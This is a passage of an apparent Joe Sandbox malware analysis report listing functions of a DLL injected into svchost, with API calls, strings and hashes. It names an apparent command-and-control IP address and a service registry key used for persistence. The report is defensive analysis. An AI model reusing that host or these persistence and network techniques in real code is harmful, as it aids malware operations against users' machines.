                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Localmemcpy$??2@??3@$AllocFreeSizeSleep
                                                                                                                • String ID: 119.91.152.151
                                                                                                                • API String ID: 3084024409-912133076
                                                                                                                • Opcode ID: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
                                                                                                                • Instruction ID: 6c6233c5ed4335591c5831c53d58df47d942e828471bf6846fd26331ce1e1182
                                                                                                                • Opcode Fuzzy Hash: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
                                                                                                                • Instruction Fuzzy Hash: 1BE092750036317BF341ABA09C4DFCF3A6DEF097D1F044104FB49A5199CB51564187E6
                                                                                                                Function 10001863 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 100012A4: VirtualFree.KERNEL32(?,00000000,00008000,?,10001878,?,00000144,00000000,1000381E,000000C8,00000144), ref: 100012B6
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                                                • memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                                                • memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                                                  • Part of subcall function 1000104C: memcpy.MSVCRT(?,00000003,00000003,00000000,?,?,10001947,?,00000003,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001074
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@$FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 494799333-0
                                                                                                                • Opcode ID: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
                                                                                                                • Instruction ID: a26a835bd5f016d956b68753e1f5501337bc07bd69db5d8cf19c0b84b9b19e4d
                                                                                                                • Opcode Fuzzy Hash: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
                                                                                                                • Instruction Fuzzy Hash: B631CBB9601204BBFF01EB64DD92FEE77AAEF44380F004019F605A6186DFB4BB149751
                                                                                                                Function 10002AC4 Relevance: 9.1, APIs: 6, Instructions: 51stringwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strupr$MessageSendVisibleWindowlstrlenstrstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 850376632-0
                                                                                                                • Opcode ID: 863bd39a3c954a72feaba740ccb092445ef11d91041d151f256abd7524e25783
                                                                                                                • Instruction ID: f84e90a798d893893a4456b5c45592e19e504f04fdea282cdc153707e49d09ee
                                                                                                                • Opcode Fuzzy Hash: 863bd39a3c954a72feaba740ccb092445ef11d91041d151f256abd7524e25783
                                                                                                                • Instruction Fuzzy Hash: 3001B9726002296FFF109F64DC49F9A7BBCEB04385F204076E705E6094DB71E9468BA4
                                                                                                                Function 10003E12 Relevance: 9.0, APIs: 6, Instructions: 41COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: f0b267456437bb5650b3bd9d655f830ec4ec3bf790c62446a31930fdfe0cb4b5
                                                                                                                • Instruction ID: d8b8667a67b2f2557cad44f9379b5e8f255c0c6237c58758e20748922239760e
                                                                                                                • Opcode Fuzzy Hash: f0b267456437bb5650b3bd9d655f830ec4ec3bf790c62446a31930fdfe0cb4b5
                                                                                                                • Instruction Fuzzy Hash: A6F0EC706007459AEA61EE7ACC44B17F3ECEF90AD1B028929A451D3694DA74EC458960
                                                                                                                Function 100026DF Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 30stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlenwsprintf
                                                                                                                • String ID: Group$Remark$SYSTEM\CurrentControlSet\Services\%s$SySyeu
                                                                                                                • API String ID: 350797232-2818619236
                                                                                                                • Opcode ID: b298f06eb582685539f31f60401fdbef796c9698157982a35a7a39406c1ee736
                                                                                                                • Instruction ID: a3fc7b85e27bf4a01dcc346c82e5e7340bd10ea751e75b0120d021e994437014
                                                                                                                • Opcode Fuzzy Hash: b298f06eb582685539f31f60401fdbef796c9698157982a35a7a39406c1ee736
                                                                                                                • Instruction Fuzzy Hash: CCF065B6800124B7FF10AB54DC4AFDA3B6DDB083D4F1040E1FE0966158EBB55A94CBD1
                                                                                                                Function 1000389D Relevance: 8.9, APIs: 7, Instructions: 117memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2335822491-0
                                                                                                                • Opcode ID: e49d25e9bb0d4a180f47fe763da8cbfb8d19a32eb96c44da1c7ada0cf7328320
                                                                                                                • Instruction ID: eacb235572be496481c28daf470fd61b07f9ecf460b9dfe0afcc7509c1ddb230
                                                                                                                • Opcode Fuzzy Hash: e49d25e9bb0d4a180f47fe763da8cbfb8d19a32eb96c44da1c7ada0cf7328320
                                                                                                                • Instruction Fuzzy Hash: 88314A71600701AFE715CFA9CD85E6BBBECEF49794F118029F644DB285D7B0E9408BA4
                                                                                                                Function 1000389C Relevance: 8.9, APIs: 7, Instructions: 115memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2335822491-0
                                                                                                                • Opcode ID: 9aa3b273a59eb2c0b2545a37afc38cd619bd195e7d1346904624c1b6da4ac45c
                                                                                                                • Instruction ID: 10317215f663cfab710d715b633d7b0dbc04a231647ffe3f91967b0172577e13
                                                                                                                • Opcode Fuzzy Hash: 9aa3b273a59eb2c0b2545a37afc38cd619bd195e7d1346904624c1b6da4ac45c
                                                                                                                • Instruction Fuzzy Hash: 69317A71600701AFEB15CBA8CD85F6BBBECEF49794F108029F645DB285D7B0E8008B64
                                                                                                                Function 100011FB Relevance: 7.6, APIs: 5, Instructions: 66memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ceil.MSVCRT ref: 10001226
                                                                                                                • _ftol.MSVCRT ref: 1000122E
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001712,00000003), ref: 10001251
                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,?,?,10001712,00000003), ref: 10001275
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,10001712,00000003), ref: 10001287
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFree_ftolceilmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3927456183-0
                                                                                                                • Opcode ID: f94edee6810ba8cea6bfb4746a43b2bc9bf2551bc4d63573e388d815a9760473
                                                                                                                • Instruction ID: ff1c2b162e375ad2b81c3d4b25a5517a05f38efa8821d55832f31a3c03b13b4e
                                                                                                                • Opcode Fuzzy Hash: f94edee6810ba8cea6bfb4746a43b2bc9bf2551bc4d63573e388d815a9760473
                                                                                                                • Instruction Fuzzy Hash: 3A11C1B1700304ABF7549F65CC86B9FBBE9EB447D1F108429F655C6284DA71A8008760
                                                                                                                Function 10001155 Relevance: 7.6, APIs: 5, Instructions: 65memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ceil.MSVCRT ref: 10001187
                                                                                                                • _ftol.MSVCRT ref: 1000118F
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001947,?,00000003,?,00000144), ref: 100011A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual_ftolceil
                                                                                                                • String ID:
                                                                                                                • API String ID: 3317677364-0
                                                                                                                • Opcode ID: 7f57421f4e8a0dbe28e4ec1d2025382d16bc9b97be7dafbce8d036dedad50421
                                                                                                                • Instruction ID: 1b5d6cedb6f753cdbab920be1aa23ddc9916300482f626f48fbf4534a1b153b9
                                                                                                                • Opcode Fuzzy Hash: 7f57421f4e8a0dbe28e4ec1d2025382d16bc9b97be7dafbce8d036dedad50421
                                                                                                                • Instruction Fuzzy Hash: 29119EB1700700ABF7189F65CC85BDFBAE8EB447D1F10842DFB4AC6694EAB5E8008764
                                                                                                                Function 100013B6 Relevance: 7.5, APIs: 5, Instructions: 38synchronizationnetworkCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 100013BB
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,10002F56), ref: 100013DD
                                                                                                                • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013F3
                                                                                                                • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013FC
                                                                                                                • WSACleanup.WS2_32 ref: 10001402
                                                                                                                  • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                                                  • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001838
                                                                                                                  • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                                                  • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
                                                                                                                  • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001856
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                                                                • String ID:
                                                                                                                • API String ID: 1476891362-0
                                                                                                                • Opcode ID: 22c76b733420cd5322f8b44b49fa99b01b9ed644fac333f7b406b2753b621805
                                                                                                                • Instruction ID: 3d7d7f28339fdf93618245a95348ecc54ac045937f8d7f2223a7296bdd3ad800
                                                                                                                • Opcode Fuzzy Hash: 22c76b733420cd5322f8b44b49fa99b01b9ed644fac333f7b406b2753b621805
                                                                                                                • Instruction Fuzzy Hash: C801A934812BA1DFE725DB64CA4979EBBF5EF047D0F20465CE0A3525EACBB16A04CB11
                                                                                                                Function 1000180A Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                                                • CancelIo.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001838
                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                                                • closesocket.WS2_32(?), ref: 1000184D
                                                                                                                • SetEvent.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001856
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                • String ID:
                                                                                                                • API String ID: 1486965892-0
                                                                                                                • Opcode ID: 1871585578dca608de80bf68f21ac6b78937bcf90260c740f92b3d4c82ad3011
                                                                                                                • Instruction ID: db2c71347286e861532d4f6efb444a5e96e0316710033133ccac3d22043cdb64
                                                                                                                • Opcode Fuzzy Hash: 1871585578dca608de80bf68f21ac6b78937bcf90260c740f92b3d4c82ad3011
                                                                                                                • Instruction Fuzzy Hash: 12F05E31000729EFEB209B95CC4EE9A7BB9FF08364F204528F382915F4DBB3A9449B50
                                                                                                                Function 100042EE Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10004307
                                                                                                                • _beginthreadex.MSVCRT ref: 10004325
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10004335
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1000433E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                                                                • String ID:
                                                                                                                • API String ID: 92035984-0
                                                                                                                • Opcode ID: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
                                                                                                                • Instruction ID: faf95892778ea6415a1c54bed7ea38c560d5af97f962d2801ede21c28746a2bf
                                                                                                                • Opcode Fuzzy Hash: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
                                                                                                                • Instruction Fuzzy Hash: 93F097B1900119FFEF019FA8CC498AE7BB9FB08351B504565FD25E2264D7329A209B90
                                                                                                                Function 10003629 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 21stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                                                • lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$FreeLoadlstrcpylstrlen
                                                                                                                • String ID: Error$InstallTime
                                                                                                                • API String ID: 2132864188-3993312925
                                                                                                                • Opcode ID: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                                                • Instruction ID: e8fad5b45eeb662e546af45f25a3999bf1724c4d36ffe5c36dea95d3d4dec653
                                                                                                                • Opcode Fuzzy Hash: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                                                • Instruction Fuzzy Hash: 9DE0BF31140648B7FF115F51CC46F9D3B5AEB187D6F108054FB08680A4DB7396A09789
                                                                                                                Function 100035EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21stringnetworkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                                                • gethostname.WS2_32(?,?), ref: 10003621
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
